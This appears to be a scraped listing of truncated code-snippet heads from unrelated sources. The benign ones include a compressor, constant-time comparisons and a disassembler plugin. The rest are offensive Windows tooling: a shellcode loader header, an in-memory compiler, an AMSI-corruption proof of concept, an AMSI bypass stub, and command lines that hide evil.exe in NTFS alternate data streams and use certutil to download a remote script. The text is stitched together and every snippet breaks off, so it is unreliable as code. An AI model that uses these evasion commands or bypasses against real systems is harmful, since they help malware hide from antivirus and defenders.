| /* PROG1.C */ | |
| /* Simple Hashing LZ77 Sliding Dictionary Compression Program */ | |
| /* By Rich Geldreich, Jr. October, 1993 */ | |
| /* Originally compiled with QuickC v2.5 in the small model. */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <ctype.h> | |
| /* set this to 1 for a greedy encoder */ |
| /* | |
| Constant-time integer comparisons | |
| Written in 2014 by Samuel Neves <sneves@dei.uc.pt> | |
| To the extent possible under law, the author(s) have dedicated all copyright | |
| and related and neighboring rights to this software to the public domain | |
| worldwide. This software is distributed without any warranty. | |
| You should have received a copy of the CC0 Public Domain Dedication along with |
This is a collection of snippets, not a comprehensive guide. I suggest you start with Operational PGP.
Here is an incomplete list of things that are different from other approaches:
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
| from binaryninja import (Architecture, RegisterInfo, InstructionInfo, | |
| InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext, | |
| BranchType, | |
| LowLevelILOperation, LLIL_TEMP, | |
| LowLevelILLabel, | |
| FlagRole, | |
| LowLevelILFlagCondition, | |
| log_error, | |
| CallingConvention, | |
| interaction, |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| using System; | |
| using System.Collections.Generic; | |
| using System.Text; | |
| using System.CodeDom.Compiler; | |
| using Microsoft.CSharp; | |
| using System.IO; | |
| using System.Reflection; | |
| namespace InMemoryCompiler | |
| { | |
| class Program |
| class RoHelper | |
| { | |
| public: | |
| RoHelper() : mWinRtAvailable(false) | |
| { | |
| if (!IsWindows10OrGreater()) | |
| { | |
| return; | |
| } |
| function Subvert-CLRAntiMalware { | |
| <# | |
| .SYNOPSIS | |
| A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694. | |
| .DESCRIPTION | |
| clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open. |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace AMSIBypass2 | |
| { | |
| class Program | |
| { | |
| [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
| static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); |
